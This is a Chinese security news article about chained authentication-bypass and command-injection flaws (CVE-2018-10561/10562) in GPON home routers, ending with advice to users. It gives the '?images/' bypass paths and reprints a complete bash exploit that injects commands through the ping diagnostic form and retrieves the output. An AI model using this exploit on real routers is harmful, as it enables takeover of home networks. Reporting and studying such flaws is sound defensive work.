100万家用“光猫”中发现严重的RCE漏洞

TRex 漏洞 2018年5月5日发布
Favorite收藏

导语:VPNMentor的安全研究人员对多个GPON家庭路由器进行了全面评估,发现了一个严重的远程代码漏洞,利用此漏洞可以获得对它们的全面控制。

研究人员发现了一种绕过认证的方式来访问GPON家庭路由器(CVE-2018-10561),也就是绕过了我们俗称的“光猫”。专家们将这种身份验证绕过漏洞与另一个命令注入漏洞(CVE-2018-10562)关联在一起,就能够在设备上执行命令。

利用

专家们分析了GPON家用路由器的固件,发现两个不同的严重漏洞(CVE-2018-10561和CVE-2018-10562)可以关联在一起,以便完全控制易受攻击的设备,从而控制网络。第一个漏洞利用设备的身份验证机制,攻击者可以利用该漏洞绕过所有身份验证。

该漏洞会影响HTTP服务器的构建,HTTP服务器会在进行身份验证时检查特定的路径。这允许攻击者使用简单的技巧绕过任何端点上的身份验证。

通过追加

?images/到URL

攻击者可以绕过端点。

这适用于HTML页面和GponForm/

例如,通过插入

/menu.html?images/或/GponForm/diag_FORM?images/

专家们能够控制GPON 家用路由器。

在查看设备功能时,专家们注意到诊断端点包含ping和traceroute命令。使用主机参数就可以注入命令。

“由于路由器将ping结果保存在/ tmp并在用户重访/diag.html时将其发送给用户,因此执行命令并通过身份验证绕过漏洞获取其输出非常简单。”VPNMentor(analysis)发布的分析结果。

专家发布以下bash版本的漏洞利用代码:

#!/bin/bash
echo "[+] Sending the Command... "
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

“用两种模式反向(`)和分号(;)发送命令,因为不同的模型在不同的设备上触发”。

GPON是一种非常流行的使用光纤的无源光网络设备,这些设备由ISP(网络运营商)提供。据不完全统计,有超过100万人在使用这种类型的网络路由器。

专家们总结表示,

我们在很多随机的GPON路由器上测试了这个漏洞,并发现在这些设备上均存在此漏洞。因为很多人使用这些类型的路由器,所以这个漏洞很有可能会导致整个网络的沦陷。

建议

1.检查您的路由器是否使用GPON网络。

2.请注意,GPON路由器可能会被黑客利用。

3.与ISP沟通,了解他们可以采取哪些措施来修复该漏洞。

本文翻译自:https://securityaffairs.co/wordpress/71987/hacking/gpon-home-routers-hack.html 如若转载,请注明原文地址: http://www.4hou.com/vulnerable/11293.html
点赞 4
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论